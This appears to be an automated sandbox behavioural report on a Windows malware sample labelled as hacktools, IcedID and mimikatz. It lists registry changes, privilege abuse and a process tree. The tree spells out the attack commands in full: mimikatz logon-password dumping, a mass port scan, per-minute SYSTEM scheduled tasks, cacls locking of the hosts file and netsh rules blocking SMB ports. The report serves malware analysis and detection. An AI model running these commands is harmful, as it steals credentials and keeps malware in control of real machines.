\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language snutqkl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language umueiy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language snutqkl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3544 cmd.exe 4336 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000a000000023b9a-6.dat nsis_installer_2 behavioral2/files/0x000b000000023bb1-14.dat nsis_installer_1 behavioral2/files/0x000b000000023bb1-14.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" snutqkl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" snutqkl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" snutqkl.exe Key created \REGISTRY\USER\.DEFAULT\Software iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ snutqkl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" snutqkl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing snutqkl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ snutqkl.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4336 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 452 schtasks.exe 624 schtasks.exe 2440 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1684 2024-11-17_5a3bc856311cc408ca059a999d362ea2_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1684 2024-11-17_5a3bc856311cc408ca059a999d362ea2_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2464 snutqkl.exe Token: SeDebugPrivilege 1504 snutqkl.exe Token: SeDebugPrivilege 784 vfshost.exe Token: SeDebugPrivilege 5112 iulpaulua.exe Token: SeLockMemoryPrivilege 1700 jtpawa.exe Token: SeLockMemoryPrivilege 1700 jtpawa.exe Token: SeDebugPrivilege 2736 iulpaulua.exe Token: SeDebugPrivilege 3952 iulpaulua.exe Token: SeDebugPrivilege 1856 iulpaulua.exe Token: SeDebugPrivilege 1516 iulpaulua.exe Token: SeDebugPrivilege 3676 iulpaulua.exe Token: SeDebugPrivilege 532 iulpaulua.exe Token: SeDebugPrivilege 3312 iulpaulua.exe Token: SeDebugPrivilege 1776 iulpaulua.exe Token: SeDebugPrivilege 864 iulpaulua.exe Token: SeDebugPrivilege 1508 iulpaulua.exe Token: SeDebugPrivilege 1932 iulpaulua.exe Token: SeDebugPrivilege 3364 iulpaulua.exe Token: SeDebugPrivilege 2736 iulpaulua.exe Token: SeDebugPrivilege 3952 iulpaulua.exe Token: SeDebugPrivilege 1888 iulpaulua.exe Token: SeDebugPrivilege 4040 iulpaulua.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1684 2024-11-17_5a3bc856311cc408ca059a999d362ea2_hacktools_icedid_mimikatz.exe 1684 2024-11-17_5a3bc856311cc408ca059a999d362ea2_hacktools_icedid_mimikatz.exe 2464 snutqkl.exe 2464 snutqkl.exe 1504 snutqkl.exe 1504 snutqkl.exe 1176 xohudmc.exe 1512 umueiy.exe 3556 snutqkl.exe 3556 snutqkl.exe 5824 snutqkl.exe 5824 snutqkl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1684 wrote to memory of 3544 1684 2024-11-17_5a3bc856311cc408ca059a999d362ea2_hacktools_icedid_mimikatz.exe 84 PID 1684 wrote to memory of 3544 1684 2024-11-17_5a3bc856311cc408ca059a999d362ea2_hacktools_icedid_mimikatz.exe 84 PID 1684 wrote to memory of 3544 1684 2024-11-17_5a3bc856311cc408ca059a999d362ea2_hacktools_icedid_mimikatz.exe 84 PID 3544 wrote to memory of 4336 3544 cmd.exe 86 PID 3544 wrote to memory of 4336 3544 cmd.exe 86 PID 3544 wrote to memory of 4336 3544 cmd.exe 86 PID 3544 wrote to memory of 2464 3544 cmd.exe 94 PID 3544 wrote to memory of 2464 3544 cmd.exe 94 PID 3544 wrote to memory of 2464 3544 cmd.exe 94 PID 1504 wrote to memory of 3684 1504 snutqkl.exe 96 PID 1504 wrote to memory of 3684 1504 snutqkl.exe 96 PID 1504 wrote to memory of 3684 1504 snutqkl.exe 96 PID 3684 wrote to memory of 4304 3684 cmd.exe 98 PID 3684 wrote to memory of 4304 3684 cmd.exe 98 PID 3684 wrote to memory of 4304 3684 cmd.exe 98 PID 3684 wrote to memory of 2060 3684 cmd.exe 99 PID 3684 wrote to memory of 2060 3684 cmd.exe 99 PID 3684 wrote to memory of 2060 3684 cmd.exe 99 PID 3684 wrote to memory of 1980 3684 cmd.exe 100 PID 3684 wrote to memory of 1980 3684 cmd.exe 100 PID 3684 wrote to memory of 1980 3684 cmd.exe 100 PID 3684 wrote to memory of 1820 3684 cmd.exe 101 PID 3684 wrote to memory of 1820 3684 cmd.exe 101 PID 3684 wrote to memory of 1820 3684 cmd.exe 101 PID 3684 wrote to memory of 4736 3684 cmd.exe 102 PID 3684 wrote to memory of 4736 3684 cmd.exe 102 PID 3684 wrote to memory of 4736 3684 cmd.exe 102 PID 3684 wrote to memory of 1420 3684 cmd.exe 103 PID 3684 wrote to memory of 1420 3684 cmd.exe 103 PID 3684 wrote to memory of 1420 3684 cmd.exe 103 PID 1504 wrote to memory of 2508 1504 snutqkl.exe 111 PID 1504 wrote to memory of 2508 1504 snutqkl.exe 111 PID 1504 wrote to memory of 2508 1504 snutqkl.exe 111 PID 1504 wrote to memory of 1412 1504 snutqkl.exe 113 PID 1504 wrote to memory of 1412 1504 snutqkl.exe 113 PID 1504 wrote to memory of 1412 1504 snutqkl.exe 113 PID 1504 wrote to memory of 4348 1504 snutqkl.exe 115 PID 1504 wrote to memory of 4348 1504 snutqkl.exe 115 PID 1504 wrote to memory of 4348 1504 snutqkl.exe 115 PID 1504 wrote to memory of 1804 1504 snutqkl.exe 120 PID 1504 wrote to memory of 1804 1504 snutqkl.exe 120 PID 1504 wrote to memory of 1804 1504 snutqkl.exe 120 PID 1804 wrote to memory of 760 1804 cmd.exe 122 PID 1804 wrote to memory of 760 1804 cmd.exe 122 PID 1804 wrote to memory of 760 1804 cmd.exe 122 PID 760 wrote to memory of 3484 760 wpcap.exe 123 PID 760 wrote to memory of 3484 760 wpcap.exe 123 PID 760 wrote to memory of 3484 760 wpcap.exe 123 PID 3484 wrote to memory of 4132 3484 net.exe 125 PID 3484 wrote to memory of 4132 3484 net.exe 125 PID 3484 wrote to memory of 4132 3484 net.exe 125 PID 760 wrote to memory of 2744 760 wpcap.exe 126 PID 760 wrote to memory of 2744 760 wpcap.exe 126 PID 760 wrote to memory of 2744 760 wpcap.exe 126 PID 2744 wrote to memory of 3664 2744 net.exe 128 PID 2744 wrote to memory of 3664 2744 net.exe 128 PID 2744 wrote to memory of 3664 2744 net.exe 128 PID 760 wrote to memory of 3544 760 wpcap.exe 129 PID 760 wrote to memory of 3544 760 wpcap.exe 129 PID 760 wrote to memory of 3544 760 wpcap.exe 129 PID 3544 wrote to memory of 1860 3544 net.exe 131 PID 3544 wrote to memory of 1860 3544 net.exe 131 PID 3544 wrote to memory of 1860 3544 net.exe 131 PID 760 wrote to memory of 2584 760 wpcap.exe 132
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2116
-
C:\Windows\TEMP\letltzgie\jtpawa.exe"C:\Windows\TEMP\letltzgie\jtpawa.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Users\Admin\AppData\Local\Temp\2024-11-17_5a3bc856311cc408ca059a999d362ea2_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-17_5a3bc856311cc408ca059a999d362ea2_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\fpibtvet\snutqkl.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4336
-
-
C:\Windows\fpibtvet\snutqkl.exeC:\Windows\fpibtvet\snutqkl.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2464
-
-
-
C:\Windows\fpibtvet\snutqkl.exeC:\Windows\fpibtvet\snutqkl.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4304
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1980
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:1820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4736
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1420
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2508
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1412
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4348
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mtemsclch\taatftcev\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\mtemsclch\taatftcev\wpcap.exeC:\Windows\mtemsclch\taatftcev\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4132
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3664
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:1860
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:2584 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:4900
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1856 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2672 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:112
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3676 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:5112 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4796
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mtemsclch\taatftcev\vltbbrlit.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mtemsclch\taatftcev\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:2008 -
C:\Windows\mtemsclch\taatftcev\vltbbrlit.exeC:\Windows\mtemsclch\taatftcev\vltbbrlit.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mtemsclch\taatftcev\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mtemsclch\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\mtemsclch\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2764 -
C:\Windows\mtemsclch\Corporate\vfshost.exeC:\Windows\mtemsclch\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:784
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "dpibnnvii" /ru system /tr "cmd /c C:\Windows\ime\snutqkl.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4348 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "dpibnnvii" /ru system /tr "cmd /c C:\Windows\ime\snutqkl.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:452
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tvvutmlay" /ru system /tr "cmd /c echo Y|cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3392 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tvvutmlay" /ru system /tr "cmd /c echo Y|cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zbalbiqht" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F"2⤵PID:1952
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4544
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zbalbiqht" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:624
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1248
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2356
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3288
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2512
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2060
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1904
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2664
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4964
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1164
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2896
-
-
